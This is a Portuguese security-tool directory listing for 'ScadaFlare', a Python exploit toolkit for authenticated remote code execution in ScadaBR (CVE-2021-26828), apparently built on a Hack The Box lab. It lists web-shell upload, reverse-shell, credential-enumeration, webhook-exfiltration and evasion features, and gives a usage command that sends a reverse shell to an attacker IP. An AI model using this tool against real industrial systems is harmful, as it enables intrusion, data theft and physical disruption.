Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Framework de Exploração de RCE Autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Ferramentas/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoSegurança SCADA/ICSExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e ControleRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare Framework de Exploração de RCE Autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

58há 9 mesesAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ScadaFlare - Toolkit de Exploração de RCE Autenticado CVE-2021-26828

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Um exploit modular de RCE pós-autenticação voltado para ScadaBR <1.1.0, aprimorado para operações de red team.

ScadaFlare Demo

Recursos

  • Faz upload de shell .jsp armamentizada via view_edit.shtm
  • Suporta payloads Linux e Windows
  • Suporte a proxy SOCKS5 / HTTP
  • Gatilho de reverse shell (padrão ou base64)
  • Módulos de enumeração (DB, credenciais, Log4Shell, etc.)
  • Exfiltração via webhook (Slack / Discord)
  • Geração de script de recurso do Metasploit
  • Suporte a limpeza (kill switch)
  • Mapeamento de Técnicas MITRE ATT&CK

    FaseTécnicaID
    Acesso Inicial (pós-autenticação)Contas VálidasT1078
    ExecuçãoExplorar Aplicativo Exposto PublicamenteT1190
    Execução de ComandosWeb ShellT1505.003
    Ações de PrivilégioModificar Conteúdo WebT1505
    Acesso a CredenciaisCredencial em Arquivos de ConfiguraçãoT1552.001
    DescobertaDescoberta de Sistema RemotoT1018
    ExfiltraçãoExfiltração Via Serviço WebT1567.002
    Evasão de DefesaTunelamento de Proxy e ProtocoloT1090

    CVE

    • CVE-2021-26828
    • Descoberto por Fellipe Oliveira
    • Exploit aprimorado e modularizado

    Por Que Isso Existe

    Este exploit foi desenvolvido durante a análise do cenário HTB Pro Lab: Alchemy. O PoC original de Fellipe Oliveira era sólido, mas:

    Escrito em Python 2

    Não tinha recursos modernos como suporte a proxy, limpeza de shell e encadeamento de enumeração

    Era difícil de estender ou integrar a fluxos de trabalho de red team

    Esta versão, ScadaFlare, é uma reescrita completa em Python 3 com suporte modular, múltiplas estratégias de evasão, substituição de detecção de SO, integração com webhook, suporte a proxy SOCKS e cadeias de enumeração para uso por operadores no mundo real.

    Uso

    root@kitploit:~
    python3 scadaflare.py http://172.16.0.20:80 admin admin \
      --reverse-ip 10.10.14.44 --reverse-port 4445 \
      --verbose --cleanup
    

    Apenas Uso Legal e Ético

    ScadaFlare foi projetado exclusivamente para:

    • Educação em hacking ético
    • Testes em laboratório SCADA
    • Pesquisa defensiva e validação de vulnerabilidades

    O uso não autorizado contra sistemas industriais reais pode:

    • Interromper processos físicos
    • Causar danos ou riscos de segurança
    • Resultar em graves consequências legais

    Ao usar esta ferramenta, você aceita total responsabilidade por:

    • Obter autorização explícita por escrito
    • Operar apenas em ambientes aprovados

    Licença

    Licença MIT – consulte LICENSE

    Baixar ferramenta